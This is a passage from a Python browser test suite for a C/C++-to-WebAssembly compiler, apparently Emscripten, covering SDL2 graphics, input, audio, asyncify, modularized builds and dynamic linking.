return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
return result;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-sLEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-sUSE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-sUSE_SDL=2', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-sUSE_PTHREADS', '-sUSE_SDL=2', '-sPROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '--closure=1', '-g1', '-sLEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '-sLEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-sUSE_SDL=2', '-sUSE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-sUSE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-sUSE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-sUSE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-sUSE_SDL=2', '-sINITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-sUSE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-sGL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-sUSE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-sUSE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-sUSE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_glalphatest(self):
self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-sUSE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = read_file('test.html')
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-sGL_TESTING', '-sUSE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-sUSE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2'])
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2', '-sMAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-sUSE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-sEXIT_RUNTIME', '-sUSE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-sUSE_SDL=2', '-sUSE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-sINITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
# TODO: need to source freepats.cfg and a midi file
# 'mod': (['mid'], 'MIX_INIT_MID', 'midi.mid'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-sUSE_SDL=2',
'-sUSE_SDL_MIXER=2',
'-sSDL2_MIXER_FORMATS=' + json.dumps(formats),
'-sINITIAL_MEMORY=33554432'
])
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-sUSE_COCOS2D=3', '-sERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-sASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-sASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-sASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest_exit('browser/async.cpp', args=['-sASYNCIFY', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-sASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-sASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-sASSERTIONS', '-sSAFE_HEAP', '-profiling', '-sASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest_exit('browser/async_longjmp.cpp', args=args + ['-sASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-sASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-sASSERTIONS', '-sDISABLE_EXCEPTION_CATCHING=0', '-profiling', '-sSAFE_HEAP', '-lSDL', '-sASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-sASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-sASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-sASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-sASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
'response': (['-sASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-sASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
self.btest('browser/async_returnvalue.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-sASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-sASYNCIFY', '-sASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sMODULARIZE as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sMODULARIZE', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sEXPORT_NAME=Foo as well.
def test_minimal_runtime_export_name(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sEXPORT_NAME=Foo', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-sEXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-sEXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-sEXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-sMODULARIZE', '-sSINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message);
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
self.set_setting('EXIT_RUNTIME')
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-sWASM=0', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?exit:0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('main.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
return 0;
}
''')
create_file('side.c', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', 'side.wasm'])
print('wasm in worker (we can read binary data synchronously there)')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])
print('wasm (will auto-preload since no sync binary reading)')
# same wasm side module works
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sEXPORT_ALL', 'side.wasm'])
def test_dlopen_async(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE'])
self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-sMAIN_MODULE=2'])
def test_dlopen_blocking(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE', '-sUSE_PTHREADS', '-Wno-experimental'])
# Attempt to use dlopen the side module (without preloading) should fail on the main thread
# since the syncronous `readBinary` function does not exist.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-sMAIN_MODULE=2'])
# But with PROXY_TO_PTHEAD it does work, since we can do blocking and sync XHR in a worker.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-sMAIN_MODULE=2', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-Wno-experimental'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
